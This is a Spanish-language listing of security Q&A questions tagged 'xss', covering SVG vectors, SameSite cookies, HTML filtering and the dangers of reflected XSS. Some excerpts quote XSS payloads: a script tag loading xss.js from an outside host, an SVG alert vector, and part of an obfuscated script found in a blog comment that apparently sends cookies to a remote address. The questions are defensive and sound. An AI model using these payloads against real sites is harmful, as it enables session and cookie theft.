Preguntas con etiqueta 'xss'

2
respuestas

XSS en un elemento de entrada con estilo = “mostrar: ninguno”

Suponga que solo se permiten comillas dobles proporcionadas por el usuario en una etiqueta input que tiene el atributo style establecido en display: none . Algo como esto: <input type="text" style="display: none;" val...
hecha 02.04.2018 - 13:13
2
respuestas

¿Asegurar el sitio web de comercio electrónico grande y antiguo de XSS?

Estoy trabajando para un sitio web de comercio electrónico escrito en C # .net (no se usa CMS, mucho código) donde la seguridad no ha sido una prioridad durante mucho tiempo. Mi misión en este momento es encontrar y reparar cualquier violación d...
hecha 16.10.2017 - 10:47
3
respuestas

Encontré un código ofuscado en un comentario en mi blog. ¿Qué tengo que hacer?

Hoy estuve revisando comentarios en mi blog y encontré un comentario extraño, aquí está el texto exacto <script>var _0x352a=["\x31\x31\x34\x2E\x34\x35\x2E\x32\x31\x37\x2E\x33\x33\x2F\x76\x6C\x6B\x2E\x70\x68\x70","\x63\x6F\x6F\x6B\x69\x65...
hecha 07.08.2013 - 18:02
3
respuestas

¿La navegación de incógnito / privada evita los ataques XSS?

Al iniciar una sesión de navegación privada / de incógnito, no deben existir cookies de otros perfiles de navegación. Por ejemplo, si estoy conectado a un sitio en mi perfil de navegación principal, luego comienzo una nueva sesión de navegación...
hecha 21.10.2018 - 21:42
6
respuestas

Solución para permitir la entrada de JavaScript pero evitar XSS

Tenemos un sistema de blog simple que permite a los usuarios ingresar html y JavaScript para crear una página de blog. Soy consciente de que permitir que javascript abra la puerta a los ataques xss. Sin embargo, necesitamos permitir que los usua...
hecha 30.06.2011 - 09:20
3
respuestas

¿Qué tan graves son los ataques XSS?

Un sitio web que visito permite que este tipo de ataque se implemente con GET en la URL <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> Junto con muchos otros en esta página: enlace El sitio requiere una cuenta (generalmen...
hecha 21.10.2011 - 17:43
3
respuestas

¿Qué debe hacer un filtro HTML para protegerse contra los ataques SVG?

Recientemente aprendí que las imágenes SVG (gráficos vectoriales escalables) presentan una serie de oportunidades para ataques sutiles en la web. (Consulte el documento a continuación). Si bien las imágenes SVG pueden parecer una imagen, el form...
hecha 31.12.2012 - 23:43
2
respuestas

¿Por qué este vector XSS funciona en svg pero no en HTML?

¿Por qué este vector: <svg><script>alert&#40/1/.source&#41</script> funciona en enlace y este <script>alert&#40/1/.source&#41</script> no lo hace. ¿Cómo hace <svg> para que f...
hecha 30.05.2013 - 21:47
4
respuestas

¿Cuál es el peligro de las secuencias de comandos de Cross Site reflejadas?

¿Cuál es el peligro de las secuencias de comandos de sitios cruzados reflejados? Entiendo que el XSS reflejado es peligroso, porque es posible. Pero, ¿qué ataques prácticos se pueden realizar utilizando Reflected XSS?     
hecha 28.08.2012 - 17:59
2
respuestas

¿Serán las cookies del mismo sitio una protección suficiente contra CSRF y XSS?

Debo decir que me gusta esta idea y parece que traerá una nueva forma de protección contra CSRF y XSS o al menos reducirá esos ataques. Entonces, ¿qué tan efectiva será esta protección?    SameSite-cookies es un mecanismo para definir cómo...
hecha 30.04.2016 - 11:37